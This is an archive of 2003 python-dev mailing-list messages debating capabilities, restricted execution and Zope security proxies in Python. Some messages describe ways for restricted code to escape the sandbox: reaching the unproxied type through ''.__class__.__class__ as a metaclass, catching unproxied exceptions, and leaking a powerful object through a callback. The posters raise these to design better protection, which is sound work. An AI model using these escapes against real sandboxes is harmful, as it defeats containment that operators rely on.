I think that there is an important corollary. Changes to the security
policy are very hard to make.  For example, if we change our mind about
what should be safe or not: we have many places to make the change, we
have lots of tests to redo, and people have to reinstall or rebuild Python
to get the change. With proxies, the update is provided as a fairly small
and self-contained library update.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 15:40:08 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 10:40:08 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
Message-ID: <3E6CB1D8.4050108@zope.com>

Ka-Ping Yee wrote:
> On Sun, 9 Mar 2003, Guido van Rossum wrote:
> 
>>- Which attributes are considered introspective?
> 
> 
> Here's a preliminary description of the boundary between "introspective"
> and "restricted", off the top of my head:
> 
>     1.  The only thing you can do with a bound method is to call it
>         (bound methods have no attributes except __doc__).

Well, I see no harm and much usefulness
in allowing __name__, __repr__, and __str__.

>     2.  The following instance attributes are off limits:
>         __class__, __dict__, __module__.
> 
> That might be a reasonable start.

I generally want to be able to get the __class__. This is harmless
in my case, because I get a proxy back.

> However, there is still the problem that the established technique
> for storing instance-specific state in Python is to use globally-
> accessible data attributes instead of a limited scope.  We would
> also need to add a safe (private) place for instances to put state.

I don't understand why this is necessary. In general, you want to
restrict what attributes (data, properties, methods, etc.) are accessible
in certain situations. I don't follow what makes data attributes special.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From pedronis@bluewin.ch  Mon Mar 10 15:44:14 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 16:44:14 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
Message-ID: <025c01c2e71b$e7a3cc40$6d94fea9@newmexico>

From: "Ka-Ping Yee" <ping@zesty.ca>
> However, there is still the problem that the established technique
> for storing instance-specific state in Python is to use globally-
> accessible data attributes instead of a limited scope.  We would
> also need to add a safe (private) place for instances to put state.

Indeed, it's the fact that implementations of methods are normal functions
that access the instance attributes like everything else does
that makes Zope-proxies necessary (and a bit brittle):

class A:
 def geta(self):
    return self.a # 1

a=A()

a.a # 2

(1) and (2) are using the same operation/execution path.

The other issue, as you wrote, is also that introspection operations are like
normal operations too (and they share the same execution path also):

a.__dict__

vs.

introspect(a).__dict__

The problem is that there is obviously a flexibility/ease-of-use trade-off.
Python is a language that maximizes that and where e.g. introspection feels
easy and natural, OTOH analyzing security becomes nightmarish.

regards.


From guido@python.org  Mon Mar 10 15:47:53 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:47:53 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 11:02:26 GMT."
 <3E6C70C2.2010104@algroup.co.uk>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz> <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
 <3E6C70C2.2010104@algroup.co.uk>
Message-ID: <200303101548.h2AFm0212138@odiug.zope.com>

[Someone else]
> >>Maybe every Python object should have a flag which
> >>can be set to prevent introspection -- like the current
> >>restricted execution mechanism, but on a per-object
> >>basis. Then any object could be used as a capability.

> Guido van Rossum wrote:
> > I think the capability folks would object to calling it a capability
> > though. :-)

[Ben]
> No, objects are another way to do it, though it seems to me with 
> somewhat less ease - because the most common use of capabilities is to 
> restrict the type of access to objects other objects have, so you'd need 
> to have multiple objects proxying to the "real" one if you do it at the 
> object level.

I'm not sure I understand.  Do you mean that because there may be
several security levels you'd need different capabilities for an
object for each level?  Since there are also several methods, you
end up managing multiple capabilities in either case.

Anyway, Zope security proxies aren't "managed" this way.  The trusted
code doesn't have a set of objects representing capabilities that it
hands out -- a proxy is manufactured freshly on each use.  I wonder if
this might be one cause of repeated misunderstandings?

> If we were going to go this route, I'd like the alternative of _also_ 
> being able to set the flag on a bound method.
> 
> > Two questions:
> > 
> > - Where to store the flag?  It probably would cost 4 bytes per object.
> 
> You can swap space for time by storing it as an attribute, of course.

Not all Python objects have a dict where to store arbitrary
attributes.  And even if they do, that's about the most expensive way
to store a flag.  And you'd have to worry about someone getting a hold
of that dict and deleting the attribute (assuming that the flag
defaults to allow introspection, otherwise no Python code written
today would continue to work).
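
Both objections can be checked directly (Python 3 syntax; Plain, Slotted and
the _no_introspect flag name are hypothetical):

```python
class Plain:
    pass


class Slotted:
    __slots__ = ("x",)


# Which of these objects have a __dict__ to hold an extra attribute?
has_dict = {
    type(o).__name__: hasattr(o, "__dict__")
    for o in (42, "s", object(), Slotted(), Plain())
}

# Where a dict exists, anyone who can reach it can remove the flag.
p = Plain()
p._no_introspect = True
del vars(p)["_no_introspect"]
flag_survived = hasattr(p, "_no_introspect")
```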

> > - Which attributes are considered introspective?
> 
> All of them, except methods.

That's not very Pythonic.

> Of course, this is what my first approximation to capabilities did 
> (that's what a "capclass" was).

I never knew what a capclass was.  I don't think you ever explained
it so clearly ("doesn't allow access to non-method attributes")
before.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 15:53:14 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:53:14 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 05:14:24 CST."
 <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>
Message-ID: <200303101553.h2AFrE312165@odiug.zope.com>

> On Sun, 9 Mar 2003, Guido van Rossum wrote:
> > - Which attributes are considered introspective?
> 
> Here's a preliminary description of the boundary between "introspective"
> and "restricted", off the top of my head:
> 
>     1.  The only thing you can do with a bound method is to call it
>         (bound methods have no attributes except __doc__).

Plus __repr__ and __str__.  And if they have attributes at all they
have __getattribute__.  And if they are callable they have __call__.

>     2.  The following instance attributes are off limits:
>         __class__, __dict__, __module__.
> 
> That might be a reasonable start.

Not sure.  Classic rexec disallowed these (and a few more), but the
problem with disallowing __dict__ of an instance was that this made it
impossible for untrusted code to use certain coding patterns like
overriding __setattr__.
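
The coding pattern in question looks roughly like this (Python 3 syntax;
Validated and the port check are made up for illustration). The override has
to store the value through the instance __dict__, because a plain assignment
inside it would call __setattr__ again.

```python
class Validated:
    def __setattr__(self, name, value):
        if name == "port" and not 0 < value < 65536:
            raise ValueError("port out of range: %r" % (value,))
        # Writing via __dict__ avoids re-entering __setattr__.
        self.__dict__[name] = value


v = Validated()
v.port = 8080
```

If untrusted code is denied self.__dict__, it cannot define a class like
this one at all.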

> However, there is still the problem that the established technique
> for storing instance-specific state in Python is to use globally-
> accessible data attributes instead of a limited scope.  We would
> also need to add a safe (private) place for instances to put state.

I wonder if we could write special descriptors for this?  The problem
as I see it is that the interpreter doesn't keep track of whether a
particular function is part of a class definition or not, so there's
no way to tell whether it should have access to private data or not.

Proxies get around this, but with the stated disadvantages.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 15:40:30 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:40:30 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 04:55:42 CST."
 <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
Message-ID: <200303101540.h2AFeW012107@odiug.zope.com>

[Ping]
> By the way -- to avoid confusion between "proxies used to wrap
> unrestricted objects in order to make them into secure objects" and
> "proxies used to reduce the interface of an existing secure object",
> let's call the first "proxy" (as has been used in the "rexec vs. proxy"
> discussion so far), and call the second a "facet" (which is the term
> commonly used when capabilities people talk about reducing an interface).
> We often talk about providing, say, a "read-only facet" on an object.

Hm, I'm not sure I understand the difference between the two
definitions you give.  What does "making something into a secure
object" mean if not "reducing its interface"?  And what is the
fundamental difference between a secure object and an insecure one?
In my world view there's a gradual difference.  The only truly secure
object is None. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 10 16:12:37 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 11:12:37 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: Your message of "Mon, 10 Mar 2003 06:31:16 EST."
 <3E6C7784.5060103@zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain> <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com> <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
 <3E6C7784.5060103@zope.com>
Message-ID: <200303101612.h2AGCdV12210@odiug.zope.com>

[Jim]
> > >You don't need restricted execution to make proxies work.

[Guido]
> > Um, I think that's a dangerous mistake, or a confusion in terminology.

[Jim]
> All I'm saying is that the proxy mechanism itself doesn't rely on
> restricted execution.
> 
> > Without restricted execution, untrusted code would have access to
> > sys.modules, and from there it would be able to access
> > removeAllProxies.
> 
> All we need to be able to do is control imports.  It turns out that
> to prevent access to sys.modules, we have to replace __builtins__,
> which has the side-effect of enabling restricted execution. You
> don't need anything but the ability to restrict imports and other
> unproxied access to sys.modules to use proxies.

Turns out this was another terminology misunderstanding.  I think of
the ability to overload __import__ and set __builtins__ as part of the
restricted execution implementation, because that's why they were
implemented.  Jim thought that these were separate features, and that
restricted execution in the interpreter only referred to the closing
off of some introspection attributes (e.g. im_self, __dict__ and
func_globals).
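
The two hooks mentioned here, overloading __import__ and setting
__builtins__, can be sketched together as follows (Python 3 syntax;
ALLOWED_MODULES, guarded_import and run_untrusted are hypothetical names).
On its own this only controls imports. It is not a secure sandbox.

```python
import builtins

ALLOWED_MODULES = {"math"}  # hypothetical whitelist


def guarded_import(name, globals=None, locals=None, fromlist=(), level=0):
    """Refuse any import whose top-level package is not whitelisted."""
    if name.split(".")[0] not in ALLOWED_MODULES:
        raise ImportError("import of %r is not permitted" % name)
    return builtins.__import__(name, globals, locals, fromlist, level)


def run_untrusted(source):
    # The import statement looks up __import__ in the __builtins__
    # of the globals that the code runs in.
    env = {"__builtins__": {"__import__": guarded_import}}
    exec(source, env)
    return env


env = run_untrusted("import math\nroot = math.sqrt(16)")

try:
    run_untrusted("import sys")
    got_sys = True
except ImportError:
    got_sys = False
```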

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@zope.com  Mon Mar 10 16:59:26 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 10 Mar 2003 11:59:26 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
References: <15930.48758.62473.425111@slothrop.zope.com>
 <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org>
 <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk>
 <1046981657.15348.80.camel@slothrop.zope.com>
 <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com>
 <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1047315566.15066.7.camel@slothrop.zope.com>

On Sun, 2003-03-09 at 07:03, Guido van Rossum wrote:
> [Jim]
> > You don't need restricted execution to make proxies work.
> 
> Um, I think that's a dangerous mistake, or a confusion in terminology.
> 
> Without restricted execution, untrusted code would have access to
> sys.modules, and from there it would be able to access
> removeAllProxies.

Guido and I discovered that we were not using the same terminology in
our own discussions.  Guido suggests the following terms:

rexec -- the rexec module in the Python standard library
restricted execution -- the features in the Python code depending on
    PyEval_GetRestricted().

We still need a term to refer to an arbitrary mechanism for providing a
secure environment for untrusted code.  (I had been using "restricted
execution" to mean this.)  Perhaps a "safe interpreter"?

Jeremy


From jim@zope.com  Mon Mar 10 17:10:29 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 12:10:29 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <025c01c2e71b$e7a3cc40$6d94fea9@newmexico>
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico>
Message-ID: <3E6CC705.7000901@zope.com>

Samuele Pedroni wrote:
> From: "Ka-Ping Yee" <ping@zesty.ca>
> 
>>However, there is still the problem that the established technique
>>for storing instance-specific state in Python is to use globally-
>>accessible data attributes instead of a limited scope.  We would
>>also need to add a safe (private) place for instances to put state.
> 
> 
> Indeed, it's the fact that implementations of methods are normal functions
> that access the instance attributes like everything else does
> that makes Zope-proxies necessary (and a bit brittle):
> 
> class A:
>  def geta(self):
>     return self.a # 1
> 
> a=A()
> 
> a.a # 2
> 
> (1) and (2) are using the same operation/execution path.

This points out a nice feature of zope proxies.  The proxied
object's methods are called with an unproxied self, so you can
easily allow access to the object's methods without providing access
to other attributes. Or, equivalently, you can provide access to
one set of methods and those methods can use other methods that
you don't provide access to.
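
As a rough illustration of that feature (not the actual zope proxy code,
which is implemented in C), here is a pure-Python stand-in.  MethodProxy
and Account are hypothetical names.  A pure-Python class cannot really
hide its _target attribute, so this only shows the calling convention:
the forwarded method runs with the real, unproxied self.

```python
class Account:
    def __init__(self, balance):
        self.balance = balance

    def _audit(self):
        # Helper that clients are not given access to.
        return "balance is %d" % self.balance

    def report(self):
        # Runs with the unproxied self, so it may use _audit and balance.
        return self._audit()


class MethodProxy:
    """Hypothetical stand-in for a proxy that forwards only named methods."""

    def __init__(self, target, allowed):
        self._target = target
        self._allowed = frozenset(allowed)

    def __getattr__(self, name):
        # Only reached for names not found on the proxy itself.
        if name not in self._allowed:
            raise AttributeError("access to %r is forbidden" % name)
        # A bound method of the target: its self is the unproxied object.
        return getattr(self._target, name)


proxy = MethodProxy(Account(100), allowed=["report"])
print(proxy.report())            # allowed, and uses _audit internally
print(hasattr(proxy, "_audit"))  # the helper itself is not exposed
```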

Could you explain why you say that zope proxies are brittle?

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jeremy@zope.com  Mon Mar 10 17:18:29 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 10 Mar 2003 12:18:29 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <E18s06J-0006ZD-00@localhost>
References: <E18s06J-0006ZD-00@localhost>
Message-ID: <1047316709.15064.22.camel@slothrop.zope.com>

On Sun, 2003-03-09 at 07:40, Zooko wrote:
> 3.  A standard library that follows the Principle of Least Privilege.  That is, 
> a library full of tools that you can extend to an object in order to empower it 
> to do specific things (e.g. __builtin__.abs(), os.times(), ...) without thereby 
> also empowering it to do other things (e.g. __builtin__.file(), os.system(), 
> ...).  Python doesn't have such a library.
> 
> Now the Principle of Least Privilege approach to making a library safe is very 
> different from the "sandbox" approach.  The latter is to remove all "dangerous" 
> tools from the toolbox (or in our case, to have them dynamically disabled by the 
> "restricted" bit which is determined by an overridable policy).  The former is 
> to separate the tools so that dangerous ones don't come tied together with 
> common ones.  The security policy, then, is expressed by code that grants or 
> withholds capabilities (== references) rather than by code that toggles the 
> "restricted" bit.
> 
> Of course, you can start by denying the entire standard library to restricted 
> code, and then incrementally refactor the library or wrap it in Least-Privilege 
> wrappers.
> 
> Until you have a substantial Least-Privilege-respecting library you can't gain 
> the big benefit of capabilities -- code which is capable of doing something 
> useful without also being capable of doing harm.  (You can gain the "sandbox" 
> style of security -- code which is incapable of doing anything useful or 
> harmful.)

If you need to rewrite all the libraries to be capability-aware, then
you need to trust everyone who writes library code to understand
capabilities and be thorough enough to get them right.  I think this
exacerbates the current problem of restricted execution in Python:  The
responsibility for making the system secure is spread through the
interpreter.  To do an audit to convince yourself the system is secure,
you have to look at a lot of the interpreter.  I don't see how it would
help to add the standard library to the mix.

It seems like we have a conflict between two design principles --
economy of mechanism and least privilege.

> P.S.  I learned this three-part paradigm from Mark Miller whose paper with Chip 
> Morningstar and Bill Frantz articulates it in more detail:
> 
> http://www.erights.org/elib/capability/ode/ode-capabilities.html#patt-coop

I don't see the part of this paper that talks about library design :-). 
I assume that it's the first section "Only Connectivity Begets
Connectivity."  But I don't know if I understand how that applies to
library design in concrete terms.

Jeremy


From jeremy@alum.mit.edu  Mon Mar 10 17:26:26 2003
From: jeremy@alum.mit.edu (Jeremy Hylton)
Date: 10 Mar 2003 12:26:26 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <05a701c2e66f$6c001be0$6d94fea9@newmexico>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>
 <3E69E1BC.5090508@algroup.co.uk>
 <1047150320.2347.26.camel@localhost.localdomain>
 <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
 <05a701c2e66f$6c001be0$6d94fea9@newmexico>
Message-ID: <1047317185.15066.29.camel@slothrop.zope.com>

On Sun, 2003-03-09 at 14:09, Samuele Pedroni wrote:
> maybe the question was unclear, but it was serious, what I was asking is
> whether some restricted code can do:
> 
> try:
>   deliberate code to force exception
> except Exception,e:
>  ...
> 
> so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this
> can be the case...
> 
> then to be (likely) on the safe side, all exception class definitions for
> possible e classes: like e.g.
> 
> class MyExc(Exception):
>     ...
> 
> 
> ought to be executed _in restricted mode_, or be "trivial/empty": something
> like
> 
> class MyExc(Exception):
>     def __init__(self, msg):
>         self.message = msg
>         Exception.__init__(self, msg)
> 
>     def __str__(self):
>         return self.message
> 
> is already too much rope.
> 
> Although it seems not to have the "nice" two-level-of-calls behavior of Bastion
> instances, an unproxied instance of MyExc if MyExc was defined outside of
> restricted execution, can be used to break out of restricted execution.

Exceptions do seem like a problem.  If the exception objects are defined
in the safe interpreter, then untrusted code that catches an exception
can't follow references to an unsafe interpreter.  But it can modify the
exception objects and classes, which has the potential to cause a lot of
problems.
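
A small sketch of the "modify the exception classes" problem, in current
Python 3 syntax.  MyExc follows the quoted example; trusted_api and
untrusted are hypothetical names.  The caught instance is an ordinary
object, so its class (and, through the methods, their function globals)
is reachable by plain attribute access.

```python
class MyExc(Exception):
    def __init__(self, msg):
        Exception.__init__(self, msg)
        self.message = msg

    def __str__(self):
        return self.message


def trusted_api():
    raise MyExc("something went wrong")


def untrusted():
    try:
        trusted_api()
    except Exception as e:
        # The instance arrives unwrapped; nothing stops us from patching
        # the class that trusted code will keep using afterwards.
        type(e).__str__ = lambda self: "hijacked"


untrusted()
print(str(MyExc("original")))  # trusted code now sees the patched __str__
```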

It also complicates the design of systems that want to run untrusted
code, because they must be very careful never to pass trusted exception
instances to untrusted code.

It seems like it would be nice if proxies could be used as exceptions,
so that there was a simple mechanism to enforce protection.

Jeremy


From jeremy@zope.com  Mon Mar 10 17:36:22 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 10 Mar 2003 12:36:22 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <1047317782.15066.38.camel@slothrop.zope.com>

On Mon, 2003-03-10 at 05:51, Ka-Ping Yee wrote:
> It seems to me that the "rexec vs. proxy" debate is really about
> a very different question: How do we get from Python's currently
> promiscuous objects to properly restricted objects?

I think that's the right question.

> (Once we have properly restricted objects in either fashion, yes,
> definitely, using proxies to restrict access is a great technique.)
> 
> If i understand correctly, the "proxy" answer is "we create a
> special wrapper object, then the programmer has to individually
> wrap any object they want to be secure".  And the "rexec" answer
> is "we create an interpreter mode in which all objects are secure".

The proxy answer is a bit more complex.  Any object returned from a
proxy is itself wrapped in a proxy, except for immutable objects like
None, ints, and strings.  The initial proxy creates a barrier between
the code that created the proxy and the client that uses the proxy.

> I think the latter is far better.  To have any sort of real chance
> at establishing security, you have to start from a place where
> everything is secure, instead of starting from a place where
> everything is insecure and you have to individually secure every
> single object with its own wrapper.

It would indeed be impractical to wrap every object manually.  I think
both approaches tend towards the design principle of fail-safe defaults
and complete mediation.  A proxy mediates all access to the object it
wraps.  By default, it allows no access.  When it allows access, it
creates new proxies that provide the same facilities as the original. 
The one exception is for immutable objects.  (Immutability is good for
so many reasons.)
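
Roughly, the behavior described above could be sketched like this.  It is
a simplified pure-Python model, not the zope implementation: Proxy, wrap,
CHECKERS and IMMUTABLE are hypothetical names, and the per-type table of
allowed names is an assumption made to keep the example short.

```python
IMMUTABLE = (type(None), bool, int, float, str, bytes)  # assumed "safe" types
CHECKERS = {}  # type -> attribute names that may be accessed (hypothetical)


def wrap(value):
    """Return immutable values as they are; wrap everything else."""
    if isinstance(value, IMMUTABLE):
        return value
    return Proxy(value)


class Proxy:
    def __init__(self, target):
        self._target = target

    def __getattr__(self, name):
        # Fail-safe default: no access unless the type's checker allows it.
        allowed = CHECKERS.get(type(self._target), ())
        if name not in allowed:
            raise AttributeError("access to %r is forbidden" % name)
        return wrap(getattr(self._target, name))

    def __call__(self, *args, **kwargs):
        # Results of calls are wrapped too, so the barrier propagates.
        return wrap(self._target(*args, **kwargs))


class Document:
    def __init__(self, text):
        self.text = text

    def size(self):
        return len(self.text)


class Folder:
    def __init__(self):
        self.items = {"readme": Document("hello")}

    def get(self, name):
        return self.items[name]


CHECKERS[Folder] = {"get"}
CHECKERS[Document] = {"size"}

folder = wrap(Folder())
doc = folder.get("readme")
print(type(doc).__name__)  # the returned Document is itself proxied
print(doc.size())          # an int comes back unwrapped
```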

> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.
> Anyone wanting to do introspection would simply have to obtain
> the "introspect" capability from a privileged place (e.g. sys).
> For example,
> 
>     class Foo:
>         pass
> 
>     print Foo.__dict__                  # fails
> 
>     from sys import introspect
>     print introspect(Foo).__dict__      # succeeds
> 
> When running the interpreter in secure mode, "introspect"
> would just be missing from the sys module (again, ideally
> sys.introspect wouldn't exist by default, and a command-line
> option would turn it on, but i realize that's far away).
> 
> This would have the effect of the "introspectable flag" that
> Guido mentioned, but without expending any storage at all,
> until you actually needed to introspect something.

If Python's introspection were less ad hoc, I suppose this issue would
be easier to tackle.  (Has anyone done security design for a CLOS-style
meta-object protocol?)

Note that the biggest problem with the introspectable flag is that it
would need to be checked all over the interpreter internals.  For
example, the interpreter optimizes bound method calls by extracting
the im_self and im_func and calling im_func directly passing im_self and
the rest of the arguments.  This is all done within the mainloop using a
single type check and a bunch of macros to extract fields from the bound
method.  It is pretty common to use macros that depend on the
representation of builtin types like functions, methods, dictionaries,
etc.
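
For reference, the same decomposition is visible from Python code.  In
current Python 3 the attributes are spelled __self__ and __func__ instead
of im_self and im_func; Greeter is a hypothetical class.  The interpreter
shortcut does the equivalent in C, without going through any attribute
access that a flag could intercept.

```python
class Greeter:
    def __init__(self, name):
        self.name = name

    def greet(self, greeting):
        return "%s, %s" % (greeting, self.name)


bound = Greeter("world").greet

receiver = bound.__self__   # im_self in 2003-era Python
function = bound.__func__   # im_func in 2003-era Python

# Calling the plain function with the receiver is the same as the bound call.
print(function(receiver, "hello") == bound("hello"))
```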

Jeremy


From zooko@zooko.com  Mon Mar 10 18:24:11 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 10 Mar 2003 13:24:11 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Jeremy Hylton <jeremy@alum.mit.edu>
 of "10 Mar 2003 12:26:26 EST." <1047317185.15066.29.camel@slothrop.zope.com>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net> <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico>  <1047317185.15066.29.camel@slothrop.zope.com>
Message-ID: <E18sRwZ-0002zl-00@localhost>

 Jeremy Hylton <jeremy@alum.mit.edu> wrote:
>
> Exceptions do seem like a problem.

This reminds me of a similar problem.  Object A is a powerful object.  Object B 
is a proxy for A which passes through only a subset of A's methods.  So B is 
suitable to give to Object C, which should be able to use the B subset but not 
the full A set.

The problem is if the B subset of methods includes a callback idiom, in which 
Object A calls a function provided by its client and passes a reference to 
itself as an argument.

class A:
    def __init__(self):
        self.handlers = []

    def register_event_handler(self, handler):
        self.handlers.append(handler)

    def process_events(self):
        # ...
        for handler in self.handlers:
            handler(self)

This allows C full access to object A's methods if C has access to the 
register_event_handler() method.  (Even if A has private data and even if there 
is no flaw in the proxy or capability enforcement that prevents C from getting 
access to A through B.)

So the designer of the B proxy has to not only exclude dangerous methods of A, 
but also has to either exclude methods that lead to this kind of callback, or 
else make B a two-faced proxy that registers itself instead of C as the handler, 
forwards the callback, and passes a reference to itself instead of to A in the 
callback.
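
A sketch of such a two-faced proxy, assuming an A like the one above with
one extra dangerous method (shutdown is a made-up name).  In plain Python
the _a attribute is of course still reachable; the point is only the
shape of the forwarding.

```python
class A:
    def __init__(self):
        self.handlers = []

    def register_event_handler(self, handler):
        self.handlers.append(handler)

    def process_events(self):
        for handler in self.handlers:
            handler(self)

    def shutdown(self):  # hypothetical method that B must not expose
        return "shutdown"


class B:
    """Two-faced proxy: exposes a subset of A and never hands out A itself."""

    def __init__(self, a):
        self._a = a

    def register_event_handler(self, handler):
        # Register a forwarder with A; the client's handler receives B.
        def forward(_real_a):
            handler(self)
        self._a.register_event_handler(forward)


a = A()
b = B(a)
seen = []
b.register_event_handler(seen.append)
a.process_events()
print(seen[0] is b)  # the callback got the proxy, not the powerful object
```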

Regards,

Zooko


From pedronis@bluewin.ch  Mon Mar 10 18:53:08 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 19:53:08 +0100
Subject: [Python-Dev] Capabilities
References: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org> <025c01c2e71b$e7a3cc40$6d94fea9@newmexico> <3E6CC705.7000901@zope.com>
Message-ID: <067a01c2e736$4af64920$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
>
> Could you explain why you say that zope proxies are brittle?
>

from my small experience playing with RestrictedInterpreter:

you wrap into proxies a lot of builtins:

*) 'object' for example, then
class C(object): ... does not work

but given that some basic types are left alone, one can use
Type = ''.__class__.__class__

class C:
  __metaclass__ = Type

*) iter seems not to work (deliberate decision or bug?)
*) proxied 'property' is unusable
*) built-in functions return proxies even if the argument were unproxied:

_12 = map(None,[1,2])

class A: pass
a = A()
a.a = [1,2]

_12 = getattr(a,'a')

in both cases with the proxied version of map and getattr the result _12 would
be a proxied list.

deliberate safer-side decisions?

I can see it both ways:
- see other mail

- map(None,[obj])[0] becomes a way to get a proxied version of obj that can
be passed to code that would maybe unwrap it and believe
that is some other legit object.

regards.


From zooko@zooko.com  Mon Mar 10 20:11:04 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 10 Mar 2003 15:11:04 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: Message from Jeremy Hylton <jeremy@zope.com>
 of "10 Mar 2003 12:18:29 EST." <1047316709.15064.22.camel@slothrop.zope.com>
References: <E18s06J-0006ZD-00@localhost>  <1047316709.15064.22.camel@slothrop.zope.com>
Message-ID: <E18sTc1-0003Fj-00@localhost>

(I, Zooko, wrote the lines prepended with "> > ".)

 Jeremy Hylton <jeremy@zope.com> wrote:
>
> > Until you have a substantial Least-Privilege-respecting library you can't gain 
> > the big benefit of capabilities -- code which is capable of doing something 
> > useful without also being capable of doing harm.  (You can gain the "sandbox" 
> > style of security -- code which is incapable of doing anything useful or 
> > harmful.)
> 
> If you need to rewrite all the libraries to be capability-aware, then
> you need to trust everyone who writes library code to understand
> capabilities and be thorough enough to get them right.

With capabilities, as with any other security regime, you can execute code while 
denying it access to any of the standard libraries.  However if you want to 
provide code access to some of the standard library's privileges without 
providing access to all of them, then in any possible security regime you need 
(a) some way to express which privileges it gets and which it doesn't, with 
sufficiently fine granularity that you can grant the privileges you want while 
excluding those you must, and (b) when actually executing the code you have to 
choose which specific privileges to extend.

In a capability secure language the first step, (a) is done by the language 
designer.  Then the library designer provides a library of bundles of 
privileges, and then (b) a programmer executes the code, passing to that code 
all and only those privileges which he wants that code to have.

The library designer's job is actually pretty easy -- just: 1.  try to make 
privileges which are likely to be wanted separately conveniently separable and 
2.  try to make privileges which are likely to be wanted together conveniently 
bundled.

If the library designers err on either side, the application programmer can 
patch it up.  For example, suppose the library designer made it so that a single 
object, the "os" object, contained both the "os.system()" method and the 
"os.times()" method, and the programmer wants to extend the ability to get a 
timestamp without extending the ability to invoke arbitrary commands.  (Note: 
I'm aware that os is a module and not an object, but for now I want to think of 
it as an object to be passed by reference instead of as a module to be 
"import"'ed.  If we continue along the cap-Python path we'll have to come back 
to this.)

So the programmer just defines a proxy:

class osproxy:
    def __init__(self, os):
        self.os=os
    def times(self):
        return self.os.times()

and gives an instance of osproxy instead of the os object itself.  (In practice,
when it is only a single method, you would of course prefer to just pass the 
method itself.  The proxy pattern is more general.)

If the library designer has erred on the other side, making separate objects for 
each of a dozen different related and innocuous functions, the programmer will 
very likely define one object which contains all of those functions and pass a 
reference to that object where he would have had to pass a dozen references to a 
dozen functions.

I may have made too big a deal about this originally.  I just spent a few 
minutes browsing through modindex.html (parts of which I am already intimately 
